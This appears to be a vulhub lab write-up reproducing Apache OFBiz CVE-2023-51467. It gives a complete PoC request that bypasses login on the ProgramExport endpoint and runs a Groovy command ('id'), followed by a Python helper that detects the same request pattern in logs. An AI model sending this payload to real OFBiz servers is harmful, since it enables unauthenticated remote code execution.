Apache OFBiz - CVE-2023-51467

  • Reproduction environment: vulhub


Note

  • The service returns a 500 error


  • Per the configuration file security.properties,
  • the request headers must include Host: localhost, otherwise an error is returned


  • After adjusting the request, the page is reachable normally


Exploitation

PoC:

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost
Cookie: OFBiz.Visitor=10001
Pragma: no-cache
Cache-Control: no-cache
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://192.168.72.139:8443/accounting/control/main
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);
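The request above has a fixed shape that is easy to spot in web-server logs: a hit on the ProgramExport controller with requirePasswordChange=Y and empty USERNAME and PASSWORD in the query string, plus a groovyProgram parameter in the form body. The following detection helper is an added example written for this page; it is not part of the original write-up, vulhub, or Apache OFBiz. The access-log lines and the sample request it scans are constructed for the example (the sample body is a harmless placeholder, not the PoC payload), and the log format is assumed to be Apache/nginx common log format.

```python
"""Detection helper for the CVE-2023-51467 request pattern.

Added example, not part of the original write-up. It scans access-log
lines and raw HTTP requests for the shape the PoC uses: a request to the
ProgramExport controller whose query string carries
requirePasswordChange=Y with empty USERNAME and PASSWORD.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines in common log format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2024:12:00:01 +0000] "POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 512
10.0.0.6 - - [10/Jan/2024:12:00:02 +0000] "GET /accounting/control/main HTTP/1.1" 200 8123
10.0.0.7 - - [10/Jan/2024:12:00:03 +0000] "POST /webtools/control/ProgramExport HTTP/1.1" 302 0
10.0.0.8 - - [10/Jan/2024:12:00:04 +0000] "GET /accounting/control/main?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1" 200 300
"""

# Constructed raw request with the same headers the PoC relies on and a
# harmless placeholder body (the real PoC body is not reproduced here).
SAMPLE_REQUEST = (
    "POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1\r\n"
    "Host: localhost\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "groovyProgram=println+1"
)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+)$'
)

PROGRAM_EXPORT_PATH = "/webtools/control/ProgramExport"


def classify_request(target):
    """Return findings for one request target (path plus query string).

    auth-bypass-params: requirePasswordChange=Y together with empty
        USERNAME and PASSWORD, the combination the PoC uses.
    programexport-endpoint: any hit on the ProgramExport controller, which
        should only be reachable from an authenticated admin session.
    """
    parts = urlsplit(target)
    qs = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    bypass = (
        qs.get("requirePasswordChange", [""])[0].upper() == "Y"
        and qs.get("USERNAME", [None])[0] == ""
        and qs.get("PASSWORD", [None])[0] == ""
    )
    if bypass:
        findings.append("auth-bypass-params")
    if PROGRAM_EXPORT_PATH in parts.path:
        findings.append("programexport-endpoint")
    return findings


def scan_log(text):
    """Parse log lines and return [(ip, target, findings)] for flagged lines."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("target"), findings))
    return hits


def inspect_raw_request(raw):
    """Inspect a raw HTTP/1.1 request (request line, headers, blank line, body).

    Adds 'groovy-body' when a form-encoded body carries the groovyProgram
    parameter that ProgramExport evaluates.
    """
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    _method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    findings = classify_request(target)
    ctype = headers.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded"):
        form = parse_qs(body.strip(), keep_blank_values=True)
        if "groovyProgram" in form:
            findings.append("groovy-body")
    return findings


if __name__ == "__main__":
    for ip, target, findings in scan_log(SAMPLE_LOG):
        print(ip, target, ",".join(findings))
    print("raw request:", ",".join(inspect_raw_request(SAMPLE_REQUEST)))
```

The two findings are kept separate on purpose: any unauthenticated reach of ProgramExport is worth an alert on its own, while the requirePasswordChange/empty-credential combination on other controllers flags the same bypass technique being tried elsewhere. The write-up also notes that the request must carry Host: localhost; on a deployment behind a reverse proxy, that header value arriving from a remote client address is a further signal worth correlating with these hits.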
